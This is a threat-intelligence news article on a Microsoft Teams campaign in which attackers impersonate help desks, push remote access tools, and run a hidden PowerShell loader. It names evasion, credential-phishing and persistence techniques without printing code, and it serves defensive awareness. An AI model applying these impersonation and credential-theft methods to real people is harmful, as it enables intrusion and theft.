Social Engineering via Microsoft Teams Expands With Remote Access and PowerShell Payloads

A sustained social engineering campaign abusing Microsoft Teams to impersonate IT support and business help desks is reported by Permiso researchers. The activity, which Permiso assesses has been ongoing since May 2024, involves threat actors establishing infrastructure through newly created or compromised Teams tenants to appear as trusted contacts. As Permiso explains, “These attacks typically involve direct messages or calls originating from newly created or compromised tenants, impersonating trusted contacts to gain remote access, presented as legitimate support, which then enables the deployment of malware onto the victim’s machine.” Observations show common naming patterns such as “admin,” “engineering,” or “supportbotit.” Victims have primarily been located in English-speaking regions, spanning organizations of various sizes. Permiso notes this approach has been leveraged by groups such as Scattered Spider and has links to ransomware operations like Black Basta, showing the broad adoption of this tactic over the past several months.

The intrusion chain typically begins with the actor establishing credibility over Teams before directing victims to install remote access tools, frequently AnyDesk, or QuickAssist, granting the attacker interactive control of the host. Earlier campaigns often combined this tactic with high-volume phishing emails, sometimes numbering in the thousands, before initiating Teams contact. However, Permiso reports that recent campaigns have not consistently used this preliminary email step, suggesting evolving delivery variations across different operators. In one examined case, the attackers deployed a PowerShell command running in a hidden window initiating a download of a PowerShell script using "Invoke-RestMethod."

The PowerShell script contains indicators tied to known clusters, specifically EncryptHub and Larva-208, through static AES parameters reused across multiple campaigns. To regulate execution, the malware created a mutex, ensuring only one running instance per host, a method Permiso observed reduces noise and lowers detection chances. A notable defensive evasion step involved modifying the PowerShell process into a critical process through a call to "RtlSetProcessIsCritical," meaning termination would trigger a system crash. The script also gathered detailed system information, collecting IP addresses, UUIDs, and hardware attributes before formatting and encrypting the data for exfiltration.

Beyond reconnaissance, the script incorporated credential theft via a GUI prompt designed to resemble a legitimate configuration request, with entered credentials stored locally before exfiltration. Persistence was maintained through scheduled tasks registered under deceptive names such as “Google LLC Updater,” or failing that, registry autorun entries. The scheduled tasks ensured the retrieval and execution of follow-on payloads from attacker-controlled infrastructure, while fallback registry keys provided continuity if tasks were removed. Permiso emphasized that these campaigns show a deliberate blending of native system utilities, staged PowerShell execution, and credential harvesting, all supported by an evolving social engineering model designed to exploit trust in widely used enterprise collaboration tools.